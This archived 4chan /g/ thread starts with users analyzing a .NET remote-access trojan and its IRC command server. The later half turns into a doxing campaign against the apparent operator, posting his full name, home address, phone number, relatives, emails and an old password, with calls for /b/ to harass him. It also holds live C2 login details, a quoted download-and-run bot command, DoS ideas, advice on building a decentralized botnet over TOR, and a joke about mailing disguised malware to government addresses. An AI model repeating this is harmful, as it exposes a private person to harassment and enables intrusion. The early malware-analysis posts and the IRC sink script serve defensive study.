

/g/ - Technology


File: 19 KB, 300x200, 300px-Halcali_20070706_Japan_Expo_6.jpg
>> No.24442662

hey /g/ decided to throw that "FB hack" malware that was spamming up 4chan into IDA. What's all this mumbo jumbo? Obfuscation of payload with crypto?

.method public static hidebysig object u5rzyYVg3GqDiRiv(string QASLEpdnXynq1Z00, object[] OBCaOVYiENQWUxNviJ)
{
.maxstack 6
.locals init (class [mscorlib]System.Reflection.Assembly V0,
valuetype [mscorlib]System.Reflection.BindingFlags V1)
call unsigned int8[] kYZkK6ewPGQm3BLv::get_rn()
call class [mscorlib]System.Reflection.Assembly tlfRCIdWBWevjsG1::assm(unsigned int8[] by)
stloc.0
ldc.i4.0

>> No.24442681

Yep, looks like the symbol names are probably obfuscated to make reverse engineering harder.

What you really want to look for is a connect-back domain, or much more simply, run the thing in a VM, open up Wireshark, and see where the connections go.

>> No.24442693

I'd suggest using reflector as it looks like it was coded in .NET. IDA won't be as useful.

>> No.24442715

>>24442681
Way ahead of you actually. I think the author threw his nick into it BTW... he has some very v& shit on 2share.

Is /g/ interested in working together for great justice?

>> No.24442727

>>24442693
I looked into that but...
1) I know zero programming
2) On a netbook for the time being
3) Seemed like the real meat and potatoes is in assembly.

>> No.24442740

>>24442715
I'd love to help. However keep in mind there are probably a whole bunch of different people spreading the shit. Any old retard can spread a semi-legit-looking undetectable RAT.

Would you mind posting the nick and other things you've found in it? I don't know very much about reversing myself, unfortunately.

Tbh reversing this thing is most likely a waste of time though. The logic is going to be the same as any other reverse-connect RAT. You basically just wanna run `strings` on the thing and monitor all incoming and outgoing traffic.

>> No.24442790

>>24442740
kk... so the tcp flow was like this:

almost immediately hits api.wipmania.com for IP geolocation

I saw a sleep 1000 in there somewhere... which seemed to correspond with the wait for it connecting to we.be.thu.gs and then promptly thereafter it went to terror-squad.co

sorry for putting info out slowly. really don't want to post his nick since it led to a few thousand ftp l/ps in the first few results on google.

>> No.24442954

screw it... i'm too curious.
http://pastebin.com/9TVjrL1k

thoughts?

the md5 on this was the same as what was posted on /g/ etc. both exe loaded themselves into the reg like once every 5 seconds. i hate to talk shit without knowing programming but this all seemed VERY sloppy to me.

>> No.24442999

>>24442954
can you follow the TCP stream and save/upload it somewhere.

>> No.24443028

>>24442999
nice get.

was 10min too short on pastebin?

>> No.24443035

>>24442790
google "we.be.thu.gs"

http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html

appears it's a rather large and recent botnet command & control server, with at least an irc daemon running. the bot in question seems to be a .NET RAT called "Insomnia Bot".

no idea if it's sloppy or not, really.

if you read the blog comments, it looks like those additional exe's being downloaded are the very latest version of the bot, while the "facebook hacker" is a slightly older version. so it's probably an auto-update procedure.

Rocko/BV1 appears to be the nick of the primary controller. what nick did you see in your analysis?

>> No.24443038

>>24442790
>we.be.thu.gs

ISHYGDDT

>> No.24443068

>>24443035
reverse for endian (no fucking clue if that's the right phrase)

then ahem... KILLA... something or other. Maybe cam'ron not sure. (^_^)

>> No.24443094

>>24443038
Well obv I already did. Pretty sure I got a DDoS a few hours later (maybe they thought it was weird that I had CaptureBAT running?). Really wish I wasn't behind a SOHO... would've been nice to check that zerg rush out.

>> No.24443113

BTW can someone do an nmap -A? never got around to it but really wanted to know what was up with those domains.

>> No.24443166

OP, can you upload the executable you're working with to a file sharing site? i want to examine it myself.

>>24443068
i assume you mean little endian, which means the bytes are in reverse order.

>>24443094
wait you mean the botnet owner realized you were investigating it and he started DDoSing you?


anyway, upon further research:

BV1 appears to be the developer of the RAT, and he is also providing hosting for botnets with his server we.be.thu.gs. the individual people spreading the RAT pay for access to the software and the hosting. so there's probably a decent handful of people who are using this server.

it's kinda funny that there's a whole underground "black" hosting market, isn't it?

>>24443113
nmap on the irc server (we.be.thu.gs) shows only 3 open ports. ssh (running a non-exploitable version), an irc daemon on port 443, and a web interface on port 80. web interface requires standard HTTP authentication.

i'm curious what irc daemon it's running...

OP, can you leave me a gmail or MSN or something I can contact you with?

>> No.24443190

>>24443113
Oh, also:

nmap says it's running Linux kernel 2.6.x. Not that that's useful.

I'm a bit curious about the nature of the domain. I can't find much info on "thu.gs" and going to it simply shows an empty FTP directory. I'm wondering if it's hacked, or if it's used to give out domains, or if the bot maker actually owns it himself. Have a lot of research to do.

>> No.24443260

OP, I found some very interesting shit. Very interesting indeed.

Leave me something to contact you with.

>> No.24443266

>>24443166
http://www.2shared.com/file/n-9Fmk8I/file2exe.html

pass=get

lets feel this out a bit more in this thread. will reopen if 404

>> No.24443315

>>24443260
NO. FUCKING. SHIT!!!

Honestly... this whole thing is way bigger than my skill set. I'm just some anon studying for the CCNA that took offense to some anon saying "lol /g/ can't RE" last night.

If you can run with it then awesome... I couldn't go any further but knew it was too good to let die.

btw the cryptex guy seems to have the same humor as the spam that was on here... hmmm... couldn't be that he's related or that faussz and muvz... ;-)

>> No.24443317

>>24443266
"get" isn't working. using regular `gpg`

>> No.24443336

>>24443317
get like... EPIC GET. not like "get"

cheers!

>> No.24443371

>>24443315
I'm probably not much better than you reverse engineering wise. But if you're looking to find info on the botnet and its bot spreaders, it seems quite easy.

The owner of thu.gs and various terror-squad sites is a guy named Brendan J. He's got a huge trail of emails and accounts all over the internet. He may very well be the bot writer, too. I could probably find a lot more.

Is it worth looking into this further? Maybe send the info to moot, even?

>> No.24443396

>>24443371
Definitely... almost wish I was a tripfag. BTW looks like muvz has a twitter following one other @... He might fly a lot.

I'm just happy I could share.
>feelsgoodman.jpg

>> No.24443402

how much processing power do you need to actually host these botnet nodes?

>> No.24443424

>>24443402
Hella niggabytes

>> No.24443432

>>24443396
I'm wondering how many people are involved in all this. It definitely needs to be attacked at the root though.

Imo, post threads like this on /g/ every so often. Let's try and get /g/ to fuck with these people and this botnet. Will certainly be more interesting than the usual discussions, and it's actually a good cause. Plus they're the people spamming 4chan in the first place.

I'll update with more info today or tomorrow. Got an exam unfortunately.

>>24443402
Probably not a whole ton. You'd need a fair amount of upstream bandwidth though.

>> No.24443437

>>24443336
ok perhaps i am retarded but GET does not work either. are you saying it's a riddle of some sort or what?

>> No.24443460

I'm thinking of sending a couple pieces of cheap hardware to relatives and hosting shit in a different country

upstream I can get, 100mbit line should be sufficient to start right?

>> No.24443480

Running dox so far on the bot maker and owner of the botnet C & C server.

Name: Brendan J
Usernames: BMJ, bmjslider, BV1
Email: [email protected]

MSN: [email protected]

AIM: Neu Army1

Appears to live in California. Not 100% sure though.

>>24443460
Why do you want a botnet?

>> No.24443505

>>24443166

Yeah... we'll keep it going. I think there's room for lulz and moral faggotry in the same move.

It's time for /g/ to be something more than battle stations... especially since I did all this research on a netbook with 1gb of RAM (^_^)

>> No.24443511

>>24443480
>Why do you want a botnet?
Not him, but so I can blast Metallica's 'Master of Puppets' whilst chuckling maniacally as I make my bots do my bidding.
Oh, and the monologue. Every villain needs to have a good monologue when confronted by do-gooders.

>> No.24443618

Server we.be.thu.gs ssl required to connect. use xchat or install it on mirc accept his invalid certificate
Port 443
Password fuckyou
To connect do this /server we.be.thu.gs:+443
channels :
#US
#CA
#RU
#BR
#b8896 306039

Local users: Current Local Users: 1732 Max: 2638
Global users: Current Global Users: 1741 Max: 2647

>> No.24443648

>centralized botnet
>2012
Seriously.

>> No.24443658
File: 40 KB, 522x399, 1282786204310.jpg

>>24443618
<3 u anon

>> No.24443692

>>24443618
Might want to use a proxy to connect. Just in case he does something back to you.

>> No.24443695

>>24443648
just to experiment, also good to have an off shore server

now to have a decentralized botnet

HOW DOES THAT WORK

because I'm looking into decentralized networks, and I wanna do a decentralized LAN, kinda like a local-city undernet, free from officials.... like if nodes are taken down, it can still stay up

>> No.24443696

>>24443480
BV1 is short for Blade_V1per

He uses the usernames:

BladeV1per
Blade_V1per
Blade

Will post more tomorrow. If there's no thread about this I'll make one.

Even if we can't hack their control server or something, we can still fuck with them.

>> No.24443703

can't u throw commands at these nodes?

>> No.24443734

I'll admit I only understand half of whats going on here and that I haven't been on /g/ for that long.

This is one of the most interesting threads I've seen. Actually want to see where this goes.

>> No.24443740

4am est on a weekday

of course /g/ is interesting now

>> No.24443744

>>24443696
So pumped.

I declare this to be Project HALCALI. We shall mark related threads with their visage.

I need a few shots of gin and some sleep. Accolades anon.

>> No.24443772

>>24443734
It's gonna get more interesting soon, I promise.

I'll be back tomorrow with more information. I've done many things like this in the past, though I've never taken on a botnet before.

The next thread should probably have an OP that drives interest, like:

"Help us dox and fuck with the owners of the botnet that's responsible for all the 4chan "facebook hacker.exe" malware spam." And then some sort of call-to-arms image. I dunno.

>>24443744
Sure. Though I have no idea what HALCALI is.

Tasks others can do:

-Google the shit out of the usernames listed
-Get a decent .NET reverser and see what IRC commands are used by this bot
-The bot is named "Insomnia" so google around for Insomnia Bot information. There very well may be some exploits in it.

Relevant domains:

thu.gs
we.be.thu.gs
Anything with "terror-squad" in the name
many more

http://www.opensc.ws/cracked-malware/17627-insomnia-bot-v2-0-0-builder.html

http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html

Btw, posting this shit publicly is maybe a bad idea since Mr. "Blade V1per" may read it and take precautions. But whatever.

>> No.24443861

You could emulate a client and try to DOS the server with resource intensive communication.
Let's say the client can send something that ends up as a database query on the server. Use that to DOS.

>> No.24443885

>>24443695
All decentralized networks require some sort of bootstrapping like an initial node list.
Look into: TOR and the Kademlia DHT.
You can setup a private TOR network.

>> No.24443891

>>24443861
This might be a really good idea actually.

>> No.24443925

>>24443885
i'll look into it

really though, thanks a lot

>> No.24443974

>>24443925
TOR is the easiest way to start a decentralized botnet.
You get end-to-end encryption out of the box and it can be integrated very easily. The only downside is its size.

>> No.24444076

>>24443772
i2p would be much better for aforementioned intents and purposes.

>> No.24444854

> utorrent = botnet
> chrome = botnet

finally /g/ gets to go to war with a real botnet. this is going to be epic.

>> No.24444958

Bumping. I don't know too much, but I know enough to know that this is intredasting.

>> No.24445024
File: 360 KB, 450x191, hacker.gif

MESS WITH THE BEST, DIE LIKE THE REST

>> No.24445177

Bumping

>> No.24445285

Don't know if you guys are still here, but looks like the same malware
>>>/s/13143075

>> No.24445634

>>24445285
Indeed it does.

>> No.24445737
File: 72 KB, 450x331, 1334848857856.jpg

>>24443618
>[12:44] * You were kicked from #b8896 by b (This is not #kiddiechat)

>> No.24446950
File: 914 KB, 2560x1600, Anna_rollip.jpg

>>24445285
Ofc it's spammed on boards with adult content. People there tend to turn their brains off when the lower instincts take over.

>> No.24449329

>>24446950
Any interest in this still?

http://www.booterdown.com/ - One of the sites he helps run.

Old "introduction" by him. He confirms he lives in California: http://s1.zetaboards.com/leader_bible/topic/801305/1/#post30695

His name is almost definitely Brendan J. Still trying to figure out what the J stands for.

He also appears to manage payments for the Blackshade RAT, which is a very popular RAT.

A server or possibly personal computer he's used in the past:

lancerimpact.dyndns.info
Resolves to 174.91.127.194
Server is located in Toronto

It's running something interesting on port 443. Connecting to the port and sending any kind of data results in it spitting back some bytes and exiting. Anyone wanna try and identify what it is? I'll look into it more later.

On port 8080 there's a WRT54G login dialog. So this is probably someone's home computer, which he hacked.

An old password he's used:
byas40pz

Is it worth it remaking this thread with a more dramatic OP, to encourage others to help with this noble cause?

>> No.24449411

>>24449329
Still monitoring the thread, don't have much reverse engineering skill, but I'm willing to help with research or other random stuff. Currently studying for a midterm, but will help out over the weekend if this is still alive.

Really want to see this go somewhere

>> No.24449550

Botnet currently has 2671 bots and growing. I'd guess nearly all are from 4chan.

>>24449411
Tbh this isn't a matter of reverse engineering at the moment, more a matter of investigation. RE'ing would only tell a bit more about how the bot works, but all bots work the same to be honest. The hard part would be seeing if there are any potential vulnerabilities. A .NET reversing expert would be needed for that.

>> No.24449592

>>24449550
This may sound ignorant, but how do botnets work?

>> No.24449621

>>24449592
The bot installs on your computer and connects to a command and control server. This one is an IRC server, but others are HTTP or a custom protocol. You issue instructions to the bots via the C&C and they execute them. Most common uses are ddos, spam, etc.

>> No.24449676

>>24449621
The owner is trying to mine some bitcoins.

(12:36:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
(1:06:33 PM) BV1: .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe

https://www.virustotal.com/file/32215c7edd326319a3f9480ef7cd5ecec661bddf2ae59911fa05a0148217bad7/analysis/
Too bad that the download link for his miner was blocked or we could see which pool he uses.

>> No.24449689

>>24449550
What are some investigation techniques other than searching for stuff and using nmap to scrape basic info on hosts?

>> No.24449776

Here is some stuff I compiled on this last night for exposedbotnets.com
http://pastebin.com/zD9Q5q90
>>24449689
You can run the bot in a virtual machine and see what it connects to and what commands are received. In this case it connects using ssl, so you can't sniff the commands. Redirect the domain using the hosts file to a local irc server running on the same port and see what channels it joins. Join those on the botnet irc. The topics are encrypted, but you can just make those the topics of the local irc channels and see what happens, ie if it joins channels or prints out passwords.
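A minimal IRC "sink" for the hosts-file redirection described above, as an added example (not code from the thread or from the bot's author): it speaks just enough IRC for a bot to finish registration and JOIN, logs every line the bot sends, and can replay captured channel topics to see how the bot reacts. The server name, listening port, the sample topics and the TLS cert paths are assumptions.

```python
import socketserver
import ssl
from dataclasses import dataclass, field

SERVER_NAME = "sink.local"  # hypothetical name this fake server presents to the bot


@dataclass
class BotSession:
    """Everything we learn from one bot connection."""
    nick: str = ""
    user: str = ""
    password: str = ""
    registered: bool = False
    channels: list = field(default_factory=list)
    raw: list = field(default_factory=list)  # every line the bot sent, verbatim


def _welcome(sess):
    # The RFC 2812 numerics most clients wait for before they send JOIN
    return [
        f":{SERVER_NAME} 001 {sess.nick} :Welcome {sess.nick}",
        f":{SERVER_NAME} 376 {sess.nick} :End of /MOTD command.",
    ]


def handle_line(sess, line, topics=None):
    """Process one line from the bot; return the replies the sink should send.

    topics maps channel -> topic string, so a topic captured from the real
    server (encrypted or not) can be replayed to the bot unchanged.
    """
    topics = topics or {}
    line = line.rstrip("\r\n")
    sess.raw.append(line)
    parts = line.split()
    if not parts:
        return []
    cmd, args = parts[0].upper(), parts[1:]
    if cmd == "PASS" and args:
        sess.password = args[0].lstrip(":")  # server password the bot carries
    elif cmd == "NICK" and args:
        sess.nick = args[0]
    elif cmd == "USER" and args:
        sess.user = args[0]
    elif cmd == "PING":
        token = line.partition(" ")[2].lstrip(":")
        return [f":{SERVER_NAME} PONG {SERVER_NAME} :{token}"]
    elif cmd == "JOIN" and args:
        replies = []
        for chan in args[0].split(","):  # JOIN #a,#b [key,key]
            if chan not in sess.channels:
                sess.channels.append(chan)
            replies.append(f":{sess.nick}!{sess.user}@{SERVER_NAME} JOIN :{chan}")
            if chan in topics:
                replies.append(f":{SERVER_NAME} 332 {sess.nick} {chan} :{topics[chan]}")
            else:
                replies.append(f":{SERVER_NAME} 331 {sess.nick} {chan} :No topic is set")
        return replies
    # Registration completes once both NICK and USER have arrived
    if not sess.registered and sess.nick and sess.user:
        sess.registered = True
        return _welcome(sess)
    return []


class SinkHandler(socketserver.StreamRequestHandler):
    def handle(self):
        sess = BotSession()
        peer = self.client_address[0]
        for raw in self.rfile:  # one IRC line per iteration
            line = raw.decode("utf-8", "replace")
            print(f"[{peer}] <- {line.rstrip()}")
            for reply in handle_line(sess, line, self.server.topics):
                self.wfile.write((reply + "\r\n").encode())
        print(f"[{peer}] closed; nick={sess.nick!r} pass={sess.password!r} "
              f"channels={sess.channels}")


class SinkServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, addr, topics=None, certfile=None, keyfile=None):
        super().__init__(addr, SinkHandler)
        self.topics = topics or {}
        self.ssl_ctx = None
        if certfile:  # bot in the thread used TLS on 443 and accepted a self-signed cert
            self.ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            self.ssl_ctx.load_cert_chain(certfile, keyfile)

    def get_request(self):
        conn, addr = super().get_request()
        if self.ssl_ctx:
            conn = self.ssl_ctx.wrap_socket(conn, server_side=True)
        return conn, addr


if __name__ == "__main__":
    # In the sandbox VM: point the C2 hostname at 127.0.0.1 in the hosts file,
    # then listen on the port the bot expects (443 needs root; 6667 for a test).
    with SinkServer(("127.0.0.1", 6667), topics={"#US": "replayed topic"}) as srv:
        print("IRC sink listening on 127.0.0.1:6667")
        srv.serve_forever()
```

Pass certfile/keyfile pointing at a self-signed pair to the constructor to serve TLS on the bot's port; the bot's JOIN list and any password it presents are printed when the connection closes.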

>> No.24449907

If people are looking for simple stuff to help out,
Send abuse reports to [email protected] for 80.82.79.21, which is the ip address.
You can also report bv1.co for fake whois information.

>> No.24449932

>>24449776
what if you make a trusted root CA on the computer, then MiTM with a server running IRC over SSL with a cert from that CA? It's possible unless he's checking to make sure the cert comes from a particular authority or something.

>> No.24449965

>>24449932
You could. He is self signing the certs so it would be easy. I'm just not going to go that far.

>> No.24450003

Spokeo indicates [email protected] is Brendan Johnston.

He has online profiles tied to that account. It thinks he's 21 (most likely accurate; they source their data from marketing shit; e.g. when you give your email to a store or to enter a contest).

>> No.24450073

>>24450003
Very good work. Looks legit. Try running [email protected] as well; another email of his.

Do you actually pay for a Spokeo account, btw?

I have exams all day today but tonight I'll post all the domains of his I've found so far.

>> No.24450107

>>24450003
Youtube profile confirms the age.

>>24450073
You do for the extended information. The name and age were free.

Also, TERROR-SQUAD.CO has invalid WHOIS info. Just to rustle his jimmies I'm complaining to ICANN (he is required to maintain accurate WHOIS info).

>> No.24450138

Does anyone use Pipl and is it reliable?

>> No.24450160

>>24450107
Don't forget to complain about bv1.co as well.

>> No.24450185
File: 12 KB, 392x326, newcing.png

>>24450160
Will do.

The phone number on the TERROR-SQUAD.CO is, shockingly, accurate.

His dad's name is Chris and he's somewhere around (~30 miles most likely) Camarillo, CA

>> No.24450206
File: 42 KB, 936x364, internic.png

>>24450185
complaint one is out

>> No.24450254

>>24450206
and complaint 2
I may be able to find his city through spokeo now that I know his dad's name

>> No.24450319

Pooling the data, and going over each piece of information would help this cause. It would be wise for everyone to question everything.

The biggest challenge in id'ing someone like this is confirming what you can. Since we're on 4chan, minimizing the collateral damage should sort of be priority seeing how broad we are.

>> No.24450354

Big scams and botnets are usually run by organised crime. I'd be careful of your own trail while snooping about.

>> No.24450429

He runs lancerimpact.dyndns.info (source: pastebin of password dump of dyndns users).

That points to a server in Canada run on the ISP bell.

>> No.24450474

If he did this shit under a different name or used generic names or something like that, not linking his booter sites to his botnets or whatever (I don't understand all this shit) he could probably avoid what you're all doing.

Silly people.

>> No.24450523

>>24450003
>[email protected]
He lives in Cali...

>http://imageshack.us/homepage/?user=bmjslider
His imageshack.

>http://beta.xfire.com/profile/bmjslider/
Xfire.


And [email protected] has so many fucking accounts.

http://pipl.com/search/?q=bladeviper%40live.ca&l=&sloc=&in=6

>> No.24450586

>>24450523
Also, I don't know who Bladeviper is... But he discusses LoL on Reddit.

>> No.24450730

Is there any activity between bot and C&C?
If so, it should be rather easy to sniff it via MITM and keep it active, which is important since cmd timestamps etc., which help fingerprinting.

>> No.24450743

He's got his client set up to tell all his bots to download his bitcoin miner every 30 minutes. Does he not know about how to set up a link in the topic for onjoin?

>> No.24450759

>>24450730
The connection is encrypted with ssl. Not much activity going on in the channels.

>> No.24450889

>>24450586
It's used by multiple people as a name. It's not all him.

It looks like the stumbleupon is real. profile says 21 and california. probably the congregate too

>> No.24450945
File: 13 KB, 640x126, class-act.jpg

>he buys virtual items
>then he disputes them as unauthorized
This kid is a douche
http://www.sythe.org/showthread.php?p=8787215#post8787215

>> No.24451059

>>24450945
>http://www.sythe.org/showthread.php?p=8787215#post8787215
Only one guy who wanted to buy gold hasn't been banned. Lots of scammers I guess.

>> No.24451099

I tried to get his name through Paypal, but that's out. He's been banned.

>> No.24451140

>>24451099
PSN ID is LegendBV1
Runescape name BV1
Old Runescape name Paariah
XBL Gamertag: Pears LOL

>> No.24451181

>>24451140
he accepts payment for his products using runescape gold, so you could probably report him for real money trading.

>> No.24451193

>>24451181
Mageblackx15/Casey is a friend of his
Source: LegendBV1 youtube (age matches)

>> No.24451267

what is this I don't even...
http://www.wix.com/bmjslider/test123

>> No.24451329

Game over folks
He registered real address info on one domain
http://whois.domaintools.com/bv1.biz

Stupid kid

>> No.24451377

>>24451329

is he going to get in legal trouble or are people just gonna order pizza to his house?

>> No.24451402

>>24451377
If he's running a botnet and people sent this information to the FBI or some shit as a tip? He could end up in potential legal trouble. Running a botnet in the US is pretty fucking stupid.

>> No.24451431

His house
note the 1615 on the mailbox
(pic is shit due to the moving truck)

>> No.24451443

>>24451431
nice botnet link

almost clicked and joined by accident

>> No.24451480

>>24451329
Beds: 3
Baths: 2
Sqft: 1,655
Lot: 24,684 sq ft / 0.57 acres
Type: Single Family
Year built: 1962
Last sold: Apr 1992 for $314,000
Parking: Garage - Attached
Cooling: Central
Heating: Forced air
Fireplace: Yes
This 1655 square foot single family home has 3 bedrooms and 2.0 bathrooms. It is located at 1615 El Dorado Dr Thousand Oaks, California. This home is in the Conejo Valley Unified School District. The nearest schools are Meadows Elementary School, Los Cerritos Middle School and Century High.

>> No.24451489

>>24451431
HS graduation
http://www.toacorn.com/news/2008-06-19/schools/041.html

http://ww2.conejo.k12.ca.us/westlake/arrow/2008Archive/May30,2008/pdfs/A12-13May.pdf
goes/went to to moorpark college

guess community college leaves him enough time to host a botnet on the side

>> No.24451495

>>24451443
google maps?

>> No.24451533

Holy shit. The power of collaboration. I don't know the whole story, but it is stupid to run a botnet in America.

>> No.24451547

>>24451533
We're just making stuff up you dumbass

>> No.24451559

>>24451547
You can google the info easily, it all ties together.

>> No.24451590

>>24451547

Who the fuck would spend the better part of 12 hours making shit up? Oh wait, I forgot where I was for a moment.

In seriousness, these things tend to pay off in a big way every time /g/ comes across something like this.

>> No.24451612

>centralized botnet
if it's not decentralized and uses public key authentication for commands then it's shit

I like this thread :3

>> No.24451621

>>24451547
'Sup, Brendan?

>> No.24451632

http://www.robtex.com/dns/bv1.biz.html
>Host names sharing IP with A records (1 item)
>thu.gs
AND WE'VE CLEANLY TIED BRENDAN JOHNSTON IN THOUSAND OAKS CA TO THU.GS

TADA

>> No.24451676

ITT: expert googlers

>> No.24451686

>>24451676
I don't think any of us are pretending to be anything more than that.

>> No.24451690

Has someone considered contacting the FBI or whoever deals with botnets in Murrica?

>> No.24451703

>>24451632
>Domains sharing name servers (24 items)
>They're all fucking spam/scam sites
Jeebus.

>> No.24451722

>>24451690
/b/ is probably faster than sending a formal fbi complaint

>> No.24451749

Hey, the WHOIS data on the tHu.gs domain is fake, should I complain?

>> No.24451768

>>24451749
Yes.

>> No.24451770
File: 218 KB, 720x480, Big NO.png

never change /g/

>> No.24451774

>>24451749
yes please do

and have /b/ "help" a bit too
that is probably where the botmaster lurks

>> No.24451775

>>24451722
Just rename it to meeting_minutes.docx.exe and send in to a bunch of .gov and .mil email addresses. That will get some attention.

>> No.24451792

>>24451775
not as fun as watching /b/ shit all over the poor fellow...

>> No.24451794

>>24451775
>yfw america turns into botnet

>> No.24451797

http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html
has updated with most of the latest info. I'll just send him the bv1.biz domain with the legit info.

>> No.24451804

>>24451768
>>24451774
Never mind, gs is south georgia. They aren't going to give a single shit about the complaint.

>> No.24451824

>>24451686
reported for false advertising

>> No.24451831
File: 115 KB, 1809x607, oFwcU.png

This nigga is cray

>> No.24451879

>>24451831

>> No.24451883

>>24451831
I wouldn't fuck with him.
He has spent more time on skid forums than I have in any vidya game.

>> No.24451903

>>24451883
None of us will fuck with him directly, I would think.

Retaliation is more likely to be legal if anything. The kid is running a botnet!

>> No.24451930
File: 50 KB, 799x384, glToQ.png

BV1 general

>> No.24451960

>>24451903
>HACK THE PLANET.
Botnets are fucking stupid.
I hope he gets buttfucked in jail.
>Inb4 my trip gets hacked by BV1

>> No.24451965

>>24451930
>mfw honeypot

>> No.24451973

Oh boy, I can't wait for this guy to become a meme and only with this ends up as a joke on /g/ with nothing happening to him.

>> No.24451975

>>24451903
Super easy to get at him legally. Report the we.be.thu.gs server to ecatel.net for botnets, [email protected]
and report thu.gs and bv1.co to icann for fake whois
http://wdprs.internic.net/

>> No.24451989

>>24451973
You know, someone COULD actually link to the archive, etc. with this information and let the FBI know.

One person complained about Thad McMichael's Facebook profile to the FB1.

>> No.24452000

>>24451989
>FB1
FBI*

>>24451975
ecatel is unlikely to care if they know they're running a bot server
.gs domains are out of ICANN jurisdiction

>> No.24452012

Paying for malware installs with credit card.
https://secure.payproglobal.com/orderpage.aspx?products=92417&customField1=
Anyone want to report them to the payment processor?

>> No.24452048

>>24452000
Are .co domains? It's registered to godaddy, so they should have the correct whois.
If they get enough abuse reports they should fold. They're hosted in the Netherlands, not Russia or somewhere. Who do they get their upstream from?

>> No.24452053

>>24452012
easy enough
email [email protected]
http://whois.domaintools.com/payproglobal.com

email the thread link that describes blackshades as a bot

>> No.24452063

>>24452048
.co domains are; that's already been complained about.

>> No.24452077

Brendan M Johnston
(805) 496-4021
1615 El Dorado Dr
Thousand Oaks, CA 91362-2116
Age: 18-24
Associated: Renee J Johnston, Edward C Johnston, Chris C Johnston, Chrisopher Johnston


>> No.24452081

>>24452048
>>24452063 here
also there's enough information to link this guy to his real name.

giving it to law enforcement is better than getting his bot server shut down and he opens up a new one in 48 hours.

>> No.24452091

>>24452081 here
and before you say, why not both, law enforcement needs to be able to collect proof that it is a botnet server, etc. that will stand in court. this info could spur an investigation.

>> No.24452114
File: 327 KB, 560x414, Randal.png

ITT

>> No.24452166

>>24452048
Edenhost won't give a shit
http://www.robtex.com/dns/thu.gs.html#shared

look at Domains sharing name servers (24 items)
(ns3.edenhost.com and ns4.edenhost.com)
they are all scam/spam sites

>> No.24452198

http://www.ic3.gov/complaint/default.aspx

>> No.24452201

>>24452114
Yeah, I don't get why put so much energy into this, normally only underage posters like to involve themselves with doxing and other assorted "whiteknight" shit, I personally do not favour any side, the guy was kind of a jerk by coming here and spamming his shit, though.

>> No.24452211

http://imageshack.us/photo/my-images/707/img0617hz.jpg/

>taking picture of bong
>hackforums on the screen
>.NET malware

Johnson confirmed for utter faggot

>> No.24452222

Thanks for this thread OP. /g/ has been pretty shit for about 4 months now. Threads like these keep me coming here

>> No.24452236

>>24452211

http://imageshack.us/photo/my-images/710/sjklrbhdsg001.jpg/

>XPS

Oh god wow it gets even funnier

>> No.24452243
File: 68 KB, 463x564, 1331871506565.jpg

>>24452211
No fucking kidding, this guy is cancer. Although if you are dumb enough to install his shit you deserve it

>> No.24452254

>>24452166
The nameservers are hosted by OVH though. If someone put together a big email documenting all the sites on them, and showing no action on the part of edenhost, they might take them down.

>> No.24452258

>>24452236
B-B-B-LINDED BY THE RICE
LIT UP LIKE A DOUCHE
XTREME GAYMEN IN THE NIGHT

>> No.24452284

>>24452254
Yeah, somebody just has to actually do the complaint.

>> No.24452293

>>24452236
His fabulous runescape wealth
http://imageshack.us/photo/my-images/4/bv120120212bv0027.png/

>> No.24452317

Hahahaha holy shit. I'm the guy who originally found some of his domains and info yesterday. I come back and see all this.

You've done me proud /g/. Very good work. Good use of Robtex as well.

If you report him to one of the local FBI cybercrime offices in California, they'll probably look into it.

Anyone wanna join his IRC server and fuck with him a bit?

>> No.24452325

So, if this guy is not living with his parents, you could say he makes a decent living off malware and illegal activities? He has 2 cars and a nice home with a pool, buys prebuilt shit, etc.

>> No.24452332

>>24452293
His runescape posse
http://imageshack.us/f/10/bv120120307bv0163.jpg/

>> No.24452342

Holy shit this is going into movie territory

http://www.threatexpert.com/report.aspx?md5=16867ad479a1f18c4f1dfcf8145dd24c
>Analysis of the file resources indicate the following possible country of origin:
>Finland

HE'S NOT ALONE IN THIS

Somebody is commenting in Finnish and using Finnish resources while compiling it (e.g. a Finnish Windows install)

This is most likely international crime among a group!

>> No.24452344

>>24452325
>not living with his parents
>screencaps of runescape wealth

>> No.24452352

>>24452325
>making a living off malware

lol'ed

>> No.24452367

>>24452342
yes they call themselves blackshades

bshades.eu

>> No.24452370

>>24452342
more like one of his BFFs he met on runescape

>> No.24452381
File: 469 KB, 214x185, 1326556511115.gif

what is IDA? what is this thread about? doxing a cyber villain?

only thing i see is an unusually collaborative /g/

thanks

>> No.24452390

>>24452325
Look at this wealth
http://imageshack.us/f/713/bv120120307bv0161.png/

>> No.24452397

>>24452342
Well the terror squad site had a log of an upload from a Ukrainian IP, not that that proves anything

>> No.24452404

>>24452381
-faggot spamming 4chan and elsewhere by selling botnet
-/g/ tracks down his info through online resources and connected usernames
-eventually we get his real address through WHOIS
-and then we find indications that he's not in this alone

>> No.24452423

>>24443692
>Just in case he does something back to you.

Doubt it. He used VB ffs.

>> No.24452424

>>24452404
-and then we find indications that he's a massive nigger faggot

FTFY

>> No.24452428

>>24452352
He sells the malware, probably does encryption for a fee, sells VPN services, etc. He probably sells the credit cards harvested by his botnet, could rent zombies, etc. Not to mention he could be using the credit cards to buy physical items, etc.

If he has a forum and a whole website, you could make $3,000-4,000 USD monthly without even working.

>> No.24452435

>>24452317
>Anyone wanna join his IRC server and fuck with him a bit?
Do you have the address?

>> No.24452441

http://sekurity.tumblr.com/post/9256524052/project-booter-down
here is himself and another faggot working on removing booters run by competitors under the guise of improving things
>This project is ran by ‘Orgy’ and ‘BV1’

>> No.24452446

>>24452404
that's neat

i haven't noticed any spam on the boards lately though...

>> No.24452450

>>24452317
the irc doesn't block tor.... yet

initiate multithreaded irc floodbots?

>> No.24452452

>>24452342
If you do some research, it appears this guy is not the actual program.

BV1/BladeV1per/Brendan Johnston is just the admin and the sales guy. He sells the bots, he provides hosting for the botnets, but he doesn't code them, presumably because he's unskilled and unintelligent. As can be seen from his forum posts.

Finding the original author of the malware would be tough.

>>24452381
tl;dr thread summary:

